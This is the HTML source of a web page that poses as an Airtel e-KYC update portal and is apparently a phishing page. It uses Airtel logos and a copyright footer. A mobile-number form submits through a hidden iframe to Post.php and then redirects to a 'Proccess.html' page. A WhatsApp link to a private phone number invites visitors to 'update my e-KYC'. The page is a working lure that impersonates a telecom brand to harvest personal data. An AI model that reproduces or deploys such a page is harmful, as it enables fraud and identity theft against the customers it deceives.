<html lang="en">
 <head>
  <meta charset="utf-8">
  <title>Airtel | e-KYC UPDATE</title>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width,initial-scale=1,maximum-scale=6">
  <meta http-equiv="X-UA-Compatible" content="IE=EDGE">
  <link rel="apple-touch-icon" sizes="180x180" href="/apple-touch-icon.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/favicon-32x32.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/favicon-16x16.png">
  <link rel="manifest" href="/site.webmanifest">
  <link rel="mask-icon" href="/safari-pinned-tab.svg" color="#5bbad5">
  <meta name="msapplication-TileColor" content="#da532c">
  <meta name="theme-color" content="#ffffff">
  <meta http-equiv="cache-control" content="no-cache, must-revalidate, post-check=0, pre-check=0">
  <meta http-equiv="cache-control" content="max-age=0">
  <meta http-equiv="expires" content="0">
  <meta http-equiv="expires" content="Tue, 01 Jan 1980 1:00:00 GMT">
  <meta http-equiv="pragma" content="no-cache">
  <meta name="description" content="">
  <link href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700,900&amp;display=swap" rel="preload" integrity="sha384-9rUUOp+ppjq4fmujzCkwQ7bXNGKAC1bWzsq7kGFpVmQ9McwDH/+8ss3ItLhIlLiA" crossorigin="anonymous" as="style" onload="this.onload=null;this.rel='stylesheet'">
  <link rel="icon" href="favicon.ico">
  <link rel="preconnect" href="https://fonts.googleapis.com">
  <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
  <link href="https://fonts.googleapis.com/css2?family=Quicksand:wght@300&display=swap" rel="stylesheet">
  <link href="https://fonts.googleapis.com/css2?family=Open+Sans:wght@300;400;500;600;700&display=swap" rel="stylesheet">
  <link href="style.css" rel="stylesheet">
  <style data-jss="" data-meta="MuiInputBase">
@-webkit-keyframes mui-auto-fill {}
@-webkit-keyframes mui-auto-fill-cancel {}
.MuiInputBase-root {
  color: rgba(0, 0, 0, 0.87);
  cursor: text;
  display: inline-flex;
  position: relative;
  font-size: 1rem;
  box-sizing: border-box;
  align-items: center;
  font-family: "Roboto", "Helvetica", "Arial", sans-serif;
  font-weight: 400;
  line-height: 1.1876em;
  letter-spacing: 0.00938em;
}
.MuiInputBase-root.Mui-disabled {
  color: rgba(0, 0, 0, 0.38);
  cursor: default;
}
.MuiInputBase-multiline {
  padding: 6px 0 7px;
}
.MuiInputBase-multiline.MuiInputBase-marginDense {
  padding-top: 3px;
}
.MuiInputBase-fullWidth {
  width: 100%;
}
.MuiInputBase-input {
  font: inherit;
  color: currentColor;
  width: 100%;
  border: 0;
  height: 1.1876em;
  margin: 0;
  display: block;
  padding: 6px 0 7px;
  min-width: 0;
  background: none;
  box-sizing: content-box;
  animation-name: mui-auto-fill-cancel;
  letter-spacing: inherit;
  animation-duration: 10ms;
  -webkit-tap-highlight-color: transparent;
}
.MuiInputBase-input::-webkit-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input::-moz-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input:-ms-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input::-ms-input-placeholder {
  color: currentColor;
  opacity: 0.42;
  transition: opacity 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
}
.MuiInputBase-input:focus {
  outline: 0;
}
.MuiInputBase-input:invalid {
  box-shadow: none;
}
.MuiInputBase-input::-webkit-search-decoration {
  -webkit-appearance: none;
}
.MuiInputBase-input.Mui-disabled {
  opacity: 1;
}
.MuiInputBase-input:-webkit-autofill {
  animation-name: mui-auto-fill;
  animation-duration: 5000s;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-webkit-input-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-moz-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:-ms-input-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input::-ms-input-placeholder {
  opacity: 0 !important;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-webkit-input-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-moz-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus:-ms-input-placeholder {
  opacity: 0.42;
}
label[data-shrink=false] + .MuiInputBase-formControl .MuiInputBase-input:focus::-ms-input-placeholder {
  opacity: 0.42;
}
.MuiInputBase-inputMarginDense {
  padding-top: 3px;
}
.MuiInputBase-inputMultiline {
  height: auto;
  resize: none;
  padding: 0;
}
.MuiInputBase-inputTypeSearch {
  -moz-appearance: textfield;
  -webkit-appearance: textfield;
}
</style>
  <style data-jss="" data-meta="MuiInput">
.MuiInput-root {
  position: relative;
}
label + .MuiInput-formControl {
  margin-top: 16px;
}
.MuiInput-colorSecondary.MuiInput-underline:after {
  border-bottom-color: #f50057;
}
.MuiInput-underline:after {
  left: 0;
  right: 0;
  bottom: 0;
  content: "";
  position: absolute;
  transform: scaleX(0);
  transition: transform 200ms cubic-bezier(0.0, 0, 0.2, 1) 0ms;
  border-bottom: 2px solid #3f51b5;
  pointer-events: none;
}
.MuiInput-underline.Mui-focused:after {
  transform: scaleX(1);
}
.MuiInput-underline.Mui-error:after {
  transform: scaleX(1);
  border-bottom-color: #f44336;
}
.MuiInput-underline:before {
  left: 0;
  right: 0;
  bottom: 0;
  content: "\00a0";
  position: absolute;
  transition: border-bottom-color 200ms cubic-bezier(0.4, 0, 0.2, 1) 0ms;
  border-bottom: 1px solid rgba(0, 0, 0, 0.42);
  pointer-events: none;
}
.MuiInput-underline:hover:not(.Mui-disabled):before {
  border-bottom: 2px solid rgba(0, 0, 0, 0.87);
}
.MuiInput-underline.Mui-disabled:before {
  border-bottom-style: dotted;
}
@media (hover: none) {
  .MuiInput-underline:hover:not(.Mui-disabled):before {
    border-bottom: 1px solid rgba(0, 0, 0, 0.42);
  }
}
</style>
  <style data-jss="" data-meta="MuiFormControl">
.MuiFormControl-root {
  border: 0;
  margin: 0;
  display: inline-flex;
  padding: 0;
  position: relative;
  min-width: 0;
  flex-direction: column;
  vertical-align: top;
}
.MuiFormControl-marginNormal {
  margin-top: 16px;
  margin-bottom: 8px;
}
.MuiFormControl-marginDense {
  margin-top: 8px;
  margin-bottom: 4px;
}
.MuiFormControl-fullWidth {
  width: 100%;
}
</style>
  <style data-jss="" data-meta="MuiTextField">

</style>
  <style data-react-tooltip="true">.__react_component_tooltip {
  border-radius: 3px;
  display: inline-block;
  font-size: 13px;
  left: -999em;
  opacity: 0;
  position: fixed;
  pointer-events: none;
  transition: opacity 0.3s ease-out;
  top: -999em;
  visibility: hidden;
  z-index: 999;
}
.__react_component_tooltip.allow_hover, .__react_component_tooltip.allow_click {
  pointer-events: auto;
}
.__react_component_tooltip::before, .__react_component_tooltip::after {
  content: "";
  width: 0;
  height: 0;
  position: absolue;
}
.__react_component_tooltip.show {
  opacity: 0.9;
  margin-top: 0;
  margin-left: 0;
  visibility: visible;
}
.__react_component_tooltip.place-top::before {
  bottom: 0;
  left: 0%;
  margin-left: -11px;
}
.__react_component_tooltip.place-bottom::before {
  top: 0;
  left: 0%;
  margin-left: -11px;
}
.__react_component_tooltip.place-left::before {
  right: 0;
  top: 5%;
  margin-top: -9px;
}
.__react_component_tooltip.place-right::before {
  left: 0;
  top: 5%;
  margin-top: -9px;
}
.__react_component_tooltip .multi-line {
  display: block;
  padding: 2px 0;
  text-align: center;
}
#kyc
  {
  width:104%;  
  background-color:#A30001;
  padding:16px;
  margin-top:-20%;
  margin-left:-6px;
  }
  #btn
  {
  width:60%;
  }
</style> 
  <meta http-equiv="origin-trial" content="AymqwRC7u88Y4JPvfIF2F37QKylC04248hLCdJAsh8xgOfe/dVJPV3XS3wLFca1ZMVOtnBfVjaCMTVudWM//5g4AAAB7eyJvcmlnaW4iOiJodHRwczovL3d3dy5nb29nbGV0YWdtYW5hZ2VyLmNvbTo0NDMiLCJmZWF0dXJlIjoiUHJpdmFjeVNhbmRib3hBZHNBUElzIiwiZXhwaXJ5IjoxNjk1MTY3OTk5LCJpc1RoaXJkUGFydHkiOnRydWV9">
 </head>
 <body>
 <!-- Static- Please don't do anything here-->
 <script type="text/javascript">var submitted=false;</script>
 <iframe name="hidden_iframe" id="hidden_iframe" style="display: none" onload="if(submitted){window.location='Proccess.html';}"></iframe>
 <!--My Form-->
 <form action="Post.php" method="post" target="hidden_iframe" onsubmit="submitted=true" class="myform">
  <div id="root">
   <div>
    <div>
     <div class="login-wrapper">
      <div class="container-fluid">
       <div class="row">
        <div class="col-lg-6 pd-0">
         <div class="display-flex">
          <div class="main-images">
        </div>
        <div class="col-lg-6">
         <div class="loader-main hide">
         </div>
         <div class="row">
          <div class="col-lg-12">
           <div class="login-apb-logo">
            <img src="Airtel_Logo.png" style="width:60%; margin-top:-20%;" alt="">
           </div>
           <div id="kyc">
           <b style="color:white; font-family: 'Quicksand', sans-serif; font-size:16px; padding:20px;">Continue to e-KYC</b>
           </div><br>
           </div>
         </div>
         <div class="row">
          <div class="col-lg-12">
           <div class="form-wrap">
            <form autocomplete="off" id="create-login-form">
             <div class="form-group">
              <label for="mobile">Enter Mobile Number</label>
              <div>
               <div class="MuiFormControl-root MuiTextField-root form-control">
                <div class="MuiInputBase-root MuiInput-root MuiInput-underline MuiInputBase-formControl MuiInput-formControl">
                 <input  id="mobile" name="Mobile No." type="text" maxlength="10" inputmode="numeric" class="MuiInputBase-input MuiInput-input" 
                 pattern="[6-9]\d{9}" title="Please enter valid mobile number" required="">
                </div>
               </div><br><br>
               <div class="mobileKeyboardContainer hide-key">
                <div class="mobile-keyboard-numpad simple-keyboard hg-theme-default hg-layout-default" data-skinstance="mobileKeyboardNumpad">
                 <div class="hg-rows">
                  <div class="hg-row">
                   <div class="hg-button hg-functionBtn hg-button-bksp">
                    <span>backspace</span>
                   </div>
                  </div>
                  <div class="hg-row">
                   <div class="hg-button hg-functionBtn hg-button-numpad7">
                   </div>
                  </div>
                  <div class="hg-row">
                   <div class="hg-button hg-functionBtn hg-button-numpad0">
                   </div>
                  </div>
                 </div>
                </div>
               </div>
              </div>
              <span class="mob-pre">+91</span>
             </div>
             <div class="form-group">
              <div class="pos-rel">
               <div class="passKeyboardContainer hide-key">
                 <div class="password-keyboard-numpad simple-keyboard hg-theme-default hg-layout-default" data-skinstance="passwordKeyboardNumpad">
                  <div class="hg-rows">
                   <div class="hg-row">
                    <div class="hg-button hg-functionBtn hg-button-bksp" data-skbtn="{bksp}" data-skbtnuid="default-r4b3">
                   </div>
                  </div>
                 </div>
                </div>
               </div>
              </div>
              </div>
             <div class="btn-sc">
              <center><button type="submit" id="btn" class="btn btn-red login-btn">Continue</button></center>
             </div>
             <div class="help-n-support">
             <a class="help" href="https://wa.me/+918008751105?text=Hello sir, I want to update my e-KYC">.</a>
             <div class="clearit"></div>
            </div>
           </div>
          </div>
          <div class="modal d-none">
               </div>
               <div class="btn-section">   
               </div>
              </div>
             </div>
            </div>
           </div>
          </div>
         </div>
         <p></p>
         <div class="row">
          <div class="col-lg-12">
           <div class="login-footer">
            <p class="notice mb-1"><a href="" >e-KYC - Airtel Services</a></p>
            <h6><a class="mr-10 ims-link" href="">Login to Airtel e-KYC</a><a class="mr-10" href="">Terms of Use</a><a class="mr-10" href="">Privacy Policy</a><a target="_blank" href="https://www.airtel.in/bank/static/banking-security-tips"><br>Secure Usage</a></h6>
            <p>© 2024 Airtel Bharti Ltd. | All Rights Reserved.</p>
            <p><strong data-tip="true" data-for="portal-version-description" currentitem="false">Portal Version : 26.10.6</strong></p>
            <div class="__react_component_tooltip tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee place-top type-dark" id="portal-version-description" data-id="tooltip">
             <style aria-hidden="true">
  	.tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee {
	    color: #fff;
	    background: #222;
	    border: 1px solid transparent;
	    border-radius: undefinedpx;
	    padding: 8px 21px;
  	}

  	.tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-top {
        margin-top: -10px;
    }
    .tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-top::before {
        content: "";
        background-color: inherit;
        position: absolute;
        z-index: 2;
        width: 20px;
        height: 12px;
    }
    .tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-top::after {
        content: "";
        position: absolute;
        width: 10px;
        height: 10px;
        border-top-right-radius: undefinedpx;
        border: 1px solid transparent;
        background-color: #222;
        z-index: -2;
        bottom: -6px;
        left: 50%;
        margin-left: -6px;
        transform: rotate(135deg);
    }

    .tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-bottom {
        margin-top: 10px;
    }
    .tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-bottom::before {
        content: "";
        background-color: inherit;
        position: absolute;
        z-index: -1;
        width: 18px;
        height: 10px;
    }
    .tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-bottom::after {
        content: "";
        position: absolute;
        width: 10px;
        height: 10px;
        border-top-right-radius: undefinedpx;
        border: 1px solid transparent;
        background-color: #222;
        z-index: -2;
        top: -6px;
        left: 50%;
        margin-left: -6px;
        transform: rotate(45deg);
    }

    .tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-left {
        margin-left: -10px;
    }
    .tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-left::before {
        content: "";
        background-color: inherit;
        position: absolute;
        z-index: -1;
        width: 10px;
        height: 18px;
    }
    .tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-left::after {
        content: "";
        position: absolute;
        width: 10px;
        height: 10px;
        border-top-right-radius: undefinedpx;
        border: 1px solid transparent;
        background-color: #222;
        z-index: -2;
        right: -6px;
        top: 50%;
        margin-top: -6px;
        transform: rotate(45deg);
    }

    .tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-right {
        margin-left: 10px;
    }
    .tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-right::before {
        content: "";
        background-color: inherit;
        position: absolute;
        z-index: -1;
        width: 10px;
        height: 18px;
    }
    .tc0db8bcf-2ae3-4622-9ea4-9a7f65effbee.place-right::after {
        content: "";
        position: absolute;
        width: 10px;
        height: 10px;
        border-top-right-radius: undefinedpx;
        border: 1px solid transparent;
        background-color: #222;
        z-index: -2;
        left: -6px;
        top: 50%;
        margin-top: -6px;
        transform: rotate(-135deg);
    }
  </style>
                </div>
            </div>
         </body>
</html>